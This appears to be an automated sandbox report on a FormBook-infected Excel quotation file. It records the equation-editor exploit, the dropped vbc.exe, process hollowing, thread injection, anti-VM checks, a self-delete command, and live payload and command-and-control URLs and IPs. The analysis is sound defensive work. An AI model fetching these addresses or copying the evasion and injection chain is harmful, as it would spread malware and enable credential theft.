Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$(QUOTATION)B-RUS-20061REV2.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD74B.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@10/10@2/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_01007C03 push es; ret 4_2_01007F96
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA5CE0 push 8A4000C4h; ret 4_2_00FA5CEE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA5C89 push 8A3400C4h; ret 4_2_00FA5C96
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA5C30 push 898C00C4h; ret 4_2_00FA5C3E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA3BB0 push es; iretd 4_2_00FA3BB1
Source: C:\Users\Public\vbc.exe Code function: 5_2_004178AB pushfd ; ret 5_2_004178AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040E27F push edx; iretd 5_2_0040E280
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409BD5 push esp; iretd 5_2_00409BDC
Source: C:\Users\Public\vbc.exe Code function: 5_2_004175F8 push edx; iretd 5_2_00417628
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419DA2 pushad ; retf 5_2_00419DAB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041660F push edx; iretd 5_2_00416610
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CEF2 push eax; ret 5_2_0041CEF8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CEFB push eax; ret 5_2_0041CF62
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CEA5 push eax; ret 5_2_0041CEF8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CF5C push eax; ret 5_2_0041CF62
Source: C:\Users\Public\vbc.exe Code function: 5_2_01007C03 push es; ret 5_2_01007F96
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271DFA1 push ecx; ret 8_2_0271DFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0009E27F push edx; iretd 8_2_0009E280
Source: initial sample Static PE information: section name: .text entropy: 7.61448564553
Source: initial sample Static PE information: section name: .text entropy: 7.61448564553

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEB
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 4.2.vbc.exe.25b91f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2796, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2752 Thread sleep time: -32547s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1164 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1724 Thread sleep time: -45000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409A80 rdtsc 5_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 32547 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0V
Source: explorer.exe, 00000006.00000000.483720913.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.479521551.00000000045CF000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmp Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________q_
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409A80 rdtsc 5_2_00409A80
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A526F8 mov eax, dword ptr fs:[00000030h] 5_2_00A526F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027226F8 mov eax, dword ptr fs:[00000030h] 8_2_027226F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040ACC0 LdrLoadDll, 5_2_0040ACC0
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.paradisgrp.com
Source: C:\Windows\explorer.exe Network Connect: 128.65.195.232 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.uvoyus.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: A30000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491355 Sample: (QUOTATION)B-RUS-20061REV2.xlsx Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 16 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 21 2->15         started        process3 dnsIp4 46 180.214.239.85, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->46 34 C:\Users\user\AppData\...\rundll32[1].exe, PE32 10->34 dropped 36 C:\Users\Public\vbc.exe, PE32 10->36 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 1 5 10->17         started        38 C:\...\~$(QUOTATION)B-RUS-20061REV2.xlsx, data 15->38 dropped file5 signatures6 process7 signatures8 48 Multi AV Scanner detection for dropped file 17->48 50 Tries to detect virtualization through RDTSC time measurements 17->50 52 Injects a PE file into a foreign processes 17->52 20 vbc.exe 17->20         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process11 dnsIp12 40 www.paradisgrp.com 128.65.195.232, 49166, 80 INFOMANIAK-ASCH Switzerland 23->40 42 www.uvoyus.com 23->42 44 uvoyus.com 34.102.136.180, 49167, 80 GOOGLEUS United States 23->44 70 System process connects to network (likely due to code injection or exploit) 23->70 27 msiexec.exe 23->27         started        30 autofmt.exe 23->30         started        signatures13 process14 signatures15 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 32 cmd.exe 27->32         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.102.136.180
 uvoyus.com United States
15169 GOOGLEUS false
128.65.195.232
 www.paradisgrp.com Switzerland
29222 INFOMANIAK-ASCH true
180.214.239.85
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Contacted Domains

Name IP Active
www.paradisgrp.com 128.65.195.232 true
uvoyus.com 34.102.136.180 true
www.uvoyus.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://180.214.239.85/service/rundll32.exe true
  • Avira URL Cloud: malware
 unknown
www.odysseysailingsantorini.com/cmsr/ true
  • Avira URL Cloud: safe
 low
http://www.uvoyus.com/cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp false
  • Avira URL Cloud: safe
 unknown
http://www.paradisgrp.com/cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== true
  • Avira URL Cloud: safe
 unknown